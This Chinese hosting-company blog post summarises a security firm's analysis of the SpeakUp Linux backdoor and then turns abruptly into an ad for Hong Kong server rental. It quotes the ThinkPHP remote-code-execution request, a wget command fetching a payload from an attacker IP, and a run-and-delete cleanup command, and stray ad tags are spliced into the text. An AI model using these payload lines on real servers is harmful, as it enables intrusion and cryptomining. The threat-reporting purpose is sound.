服务器杀手：带你了解新型Linux服务器杀手——speakUp

　　【小编提示】本文部分内容摘自网络,仅供参考!如需了解服务器租用\托管相关问题,请咨询YINGSOO专业客服,享受1V1贴心服务!免费热线400-630-3752

　　【选购帮助】如何部署在香港云服务器网站优化，使其访问速度更快？

服务器杀手

　　日前，全球屈指一首的internet安全解决方案供应商check point it安全部门研究人员发现了一个通过目前Linux服务器漏洞植入后门木马的黑客活动，此次攻击的目标涵盖了包括Aws主机在内的世界范围的全部服务器。攻击范围涵盖了共6个不同Linux发行版和macos系统服务器中的已知漏洞，目前黑客的主要攻击目标集中在东亚与拉美地区的Linux服务器。

　　全球speakUp“受害者”分部

　　这次的恶意攻击的罪魁祸首被命名为speakUp，命名方式是以其中一台命令与控制（c2）服务器名称进行命名的。据悉check point的研究人员发现speakUp通过Linux服务器漏洞来植入后门木马的攻击方式可以绕过目前所有安全产品，这是由于该恶意软件中存储了大量此前出现过的攻击案例，致使speakUp可以优先识别目前存在的安全漏洞，并成功绕过几乎所有的杀毒软件的“双眼”。speakUp样本采集在check point的分析报告中显示，首次发现的speakUp样本是今年1月14日在我国的服务器上发现的，该样本曾在1月9日被上传至Virustotal网站（专业的免费可疑文件分析服务网站）。但经过严密的监测后发现，^{[韩国高防护vps]}没有一家安全产品将speakUp恶意软件标为恶意。

　　这是因为为了逃避安全检测，speakUp的代码采用了base64加盐算法加密。不仅如此，c2通信也是采用了相同的方式加密。这也是为什么Virustotal上的杀毒引擎无法将其检测为恶意的原因所在。speakUp感染全过程：植入脚本阶段根据check point报告中披露的数据来看，speakUp首先是利用thinkpHp（轻量级pHp开发框架）的一个漏洞为攻击起点，从中植入一个pHp shell脚本。使用get请求（如下所示），通过thinkpHp远程代码执行漏洞cVe-2018-20062将shell脚本发送到目标服务器：s=/index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^>index.php这个shell脚本接下来会通过query中的“module”参数来执行命令。植入后门阶段在脚本生效之后，speakUp将进行像服务器植入后门的操作发送另一个Http请求（如下所示）到目标服务器：/?module=wget hxxp://67[.]209.177.163/ibus -o /tmp/e3ac24a0bcddfacd010a6c10f4a814bc实际上，这是一个注入过程，目的是植入ibus payload并将其存储到位置/tmp/e3ac24a0bcddfacd010a6c10f4a814bc启动后门并抹除痕迹阶段在植入后门成功后，speakUp将对服务器发送请求，启动后门，在启动后门后speakUp将通过删除文件来清楚自己的感染痕迹。使用如下Http请求来执行后门：/?module=perl /tmp/ e3ac24a0bcddfacd010a6c10f4a814bc;sleep 2;rm -rf /tmp/ e3ac24a0bcddfacd010a6c10f4a814bcspeakUp感染后果：在Linux服务器被感染后，speakUp使用post和get请求来与c2通信，c2是被黑的speakupomaha[.]com.。第一个post请求会发送受害者id和其他介绍性的信息，比如安装的脚本的当前版本等。对应的c2响应是needrgr，表示受感染的受害者之前未在服务器上注册，需要注册。之后，木马会通过执行以下的Linux命令来post机器的全部信息：· Uname (-r, -v, -m, -n,-a, -s)· whoami· ifconfig –a· Arp –a· cat /proc/cpuinfo | grep -c “cpu family” 2>&1· who –b

　　一旦受感染服务器注册完成，c2服务器就会发送新的任务——不同的c2服务器会命名受感染服务器来下载和执行不同的文件。有一个需要注意的点是，speakUp使用了User-Agent用户代理。具体来说，speakUp定义了三个用户代理，而受感染服务器在与c2服务器进行通信时必须使用这些代理。其中两个代理是macos X User-Agent，第三个是经过哈希处理的字符串：mozilla/5.0 (ipad; U; cpU os 3_2_1 like mac os X; en-us) ApplewebKit/531.21.10 (KHtmL, like gecko) mobile/bAddAdmozilla/5.0 (ipad; U; cpU os 3_2_1 like mac os X; en-^[YINGSOO]us) ApplewebKit/531.21.10 (KHtmL, like gecko) mobile/7b405e9bc3bd76216AFA560bFb5AcAF5731A3

　　目前，speakUp主要服务于XmRig矿工，为其提供“肉鸡（受感染服务器）”。根据XmRHunter网站的查询结果显示，攻击者的钱包目前拥有约107枚门罗币。speakUp强大的自我传播能力攻击者还为speakUp配备了一个“i”模块，它实际上是一个python脚本，使得speakUp能够扫描和感染位于受感染服务器所处内网和外网的其他更多的Linux服务器。其主要功能有：使用预定义的用户名和密码来暴力破解尝试登陆管理面板；扫描受感染服务器的网络环境，检测共享相同内部和外部子网掩码的服务器上的特定端口的可用性；尝试利用目标服务器上的远程代码执行漏洞

　　高端香港服务器租用选择

　　对于需要更高资源的复杂网站和任务关键型应用程序，高端服务器可能是最合适的托管解决方案。这些高性能托管解决方案可确保您的网站性能更加流畅，并使您的网站访问者获得最佳用户体验。其中，高端的香港服务器租用是搭建面向中国大陆、香港及亚太区广泛客户群的跨境电商网站、国际电邮、网络游戏等业务的重要平台。拥有数百万访问者的网站根本无法托管在VPS或入门级独立服务器上。这就是高端服务器发挥作用的地方。

　　一、什么是高端香港服务器

　　我们知道，典型的香港服务器租用是提供一台功能强大的物理服务器，连接到高速互联网连接，并安装在最先进的香港数据中心设施中。

　　高端专用服务器是一种先进的系统，配备强大的CPU，更大的内存模块，RAID磁盘和备份。它具有更强劲的计算能力，专为实现最高性能和满足企业工作负载而设计。

　　二、高端香港服务器租用配置

　　高端香港服务器租用通常用于托管高流量网站，Web应用程序以及性能至关重要的其他托管方案。典型的高端专用服务器将包括以下内容：

　　• 单/双最新Intel E5 2650以上系列处理器

　　• 64 GB到512 GB RAM。

　　• 带RAID 10的8至24 TB SATA或高速SSD。

　　• 冗余电源和冷却装置。

　　• 每日备份。

　　以上只是一个示例配置，可根据独特要求进行定制/升级。

　　三、高端香港服务器租用的用途